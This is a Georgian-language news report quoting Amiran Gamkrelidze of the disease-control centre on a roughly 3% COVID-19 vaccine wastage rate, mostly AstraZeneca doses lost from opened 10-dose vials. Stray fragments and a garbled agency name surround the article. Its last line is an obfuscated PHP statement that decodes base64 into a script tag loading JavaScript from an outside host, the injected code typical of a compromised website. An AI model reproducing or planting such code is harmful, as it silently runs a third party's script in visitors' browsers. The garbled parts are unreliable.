celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ცენტრის ხელმძღვანელი ამირან გამყრელიზე აცხადებს, რომ ქვეყანაში კორონავირუსის ვაქცინებზე დანაკარგი 3 პროცენტს შეადგენს.
 
NჩDჩ-ს დირექტორის თქმით, ყველაზე დიდი რაოდენობით დანაკარგები “ასტრაზენეკას” ვაქცინაზე მოდის იმიტომ, რომ ერთ ფლაკონში პრეპარატის 10 დოზაა მოთავსებული და მისი გამოყენება გახსნიდან 4-5 საათის განმავლობაში შეიძლება. რაც შეეხება სხვა ვაქცინებს, გამყრელიძის თქმით, “ფაიზერის” ვაქცინის სულ 95 დოზის ათვისება ვერ მოხერხდა, “სინოფარმისა” და “სინოვაკის” შემთხვევაში კი დანაკარგი თითქმის არ იყო:
 
“ზოგადად, ჩვენ ქვეყანაში გვაქვს 3- პროცენტიანი დანაკარგი ვაქცინებზე. ჩვენი გეგმით ეს დასაშვებია 10-დან 15 პროცენტამდე. ამ ეტაპამდე ჩვენ გვაქვს 3- პროცენტიანი დანაკარგი და ეს გახლავთ ძირითადად “ასტრაზენეკაზე”, რადგან ის 10 -დოზიან ფლაკონებში გახლავთ. სულ რაღაც 95 დოზა- “ფაიზერზე” და თითქმის არ არის “სინოფარმზე” და “სინოვაკზე”, რადგან ისინი ერთდოზიან ფლაკონშია მოთავსებული.
 
რაც შეეხება რესპუბლიკურ საავადმყოფოს, გუშინ მკითხეს და ჩვენებს დავათვლევინე. 2%-მდე არის რესპუბლიკურ საავადმყოფოში დანაკარგი ვაქცინებზე. თუმცა არ იგულისხმოთ, რომ ეს ვაქცინები სადმე დაიკარგა. საუბარია როდესაც 10- დოზიანი ფლაკონი იხსნება და ასაცრელად მიდის 5-6 ადამიანი. მოგეხსენებათ, ფლაკონის გამოყენება გახსნიდან მხოლოდ 4-5 საათი შეიძლება”, – განაცხადა ამირან გამყრელიძემ.
1295
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");